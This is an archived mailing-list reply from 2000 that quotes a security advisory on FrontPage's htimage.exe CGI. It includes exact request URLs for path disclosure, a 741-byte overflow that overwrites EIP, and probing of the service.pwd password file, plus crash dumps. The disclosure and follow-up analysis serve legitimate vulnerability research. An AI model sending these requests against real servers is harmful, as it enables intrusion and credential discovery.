Hello,
I confirmed the 742-A's caused a page fault in KERNEL32.DLL
at 0167:bff87ede under FP 3.0.2.1105, installed with PWS
under Windows 98 (PWS.EXE Version 4.02.0690). However,
this length did not force A's into the EIP. Instead the stack pointer
is corrupted, now pointing to invalid memory (which caused the page
fault). The relationship of the corrupted stack pointer to the input
overflow data is unclear (its not 0x41414141) so I'll have to do
some more reverse engineering; I did try longer strings with the
same result.
As well, the file existence test listed under Problem#3 works for
files outside of the webroot but on the same volume. For example,
if your webroot is at d:\Inetpub\wwwroot, the request,
http://server/cgi-bin/htimage.exe/test.doc?0,0
will test for the existence of a file d:\test.doc. Note however, that
htimage.exe
checks for the file d:\Inetpub\wwwroot\test.doc first and and then
d:\test.doc.
It does not allow me to test for file existence on other volumes.
Cyberiad
----- Original Message -----
From: Narrow <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, April 18, 2000 2:40 PM
Subject: More vulnerabilities in FP
> [ Reader(s), please Cc: your comments/etc to [EMAIL PROTECTED] ]
>
----------------------------------------------------------------------------
----
> -------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
> www.legion2000.cc
>
> ---- INFORMATION ----
> Program Name : CERN Image Map Dispatcher
> Discovered By : Narrow ([EMAIL PROTECTED])
> ---------------------
>
>
> Problem Description
> ~~~~~~~~~~~~~~~~~~~
> CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
FrontPage. I found three bugs
> in "htimage.exe": 1) Gives us the full path to the root directory 2)
Simple buffer overflow 3) Allow
> us to access files.
>
>
> Problem #1
> ~~~~~~~~~~
> Like I said, the first bug gives us the full path to the root directory. I
tested this vulnerability
> against some servers, all where vulnerable!
>
> Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706,
4.0.2.2717, 2.0.1.927, 3.0.2.926,
> 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are
vulnerable if we have premission
> to execute "htimage.exe" + If "htimage.exe" exist).
>
> To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default)
> and premission to execute it. That's why only Windows is vulnerable, Unix
based systems can't execute
> "*.exe" files.
>
> If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
> we get this error:
>
> --------------------------------------------------------------------------
----------
> Error
>
> Error calling HTImage:
>
> Picture config file not found, tried the following:
>
> q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
> /linux
> --------------------------------------------------------------------------
----------
>
> Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
>
> Problem #2
> ~~~~~~~~~~
> Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0"
and "FrontPage-PWS32".
> Tested / Vulnerable OS: Windows'95/98
> "htimage.exe" buffer overflows if we access it like:
http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
>
> --------------------------------------------------------------------------
----------
> HTIMAGE caused an invalid page fault in
> module <unknown> at 0000:41414141.
> Registers:
> 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
> EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
> ECX=0054015c DS=013f ESI=005401a0 FS=3467
> EDX=bff76648 ES=013f EDI=00540184 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
> 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
> --------------------------------------------------------------------------
----------
> <Server still running> + <500 Server Error>
>
> First remote FrontPage exploit?
>
>
> Problem #3
> ~~~~~~~~~~
> It's not a serious bug. Using "htimage.exe" we can access files on server,
but
> we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
> outputs:
>
> --------------------------------------------------------------------------
----------
> Error
>
> Error calling HTImage:
>
> HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
> 'polygon' (got an alphanumeric string)
> --------------------------------------------------------------------------
----------
>
> NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
>
> Solution
> ~~~~~~~~
> 1) Remove "htimage.exe".
> 2) Do not use FrontPage, simple enough :)
>
> Comments
> ~~~~~~~~
> Sorry for my bad english, not my mother/father language ;)
>
>
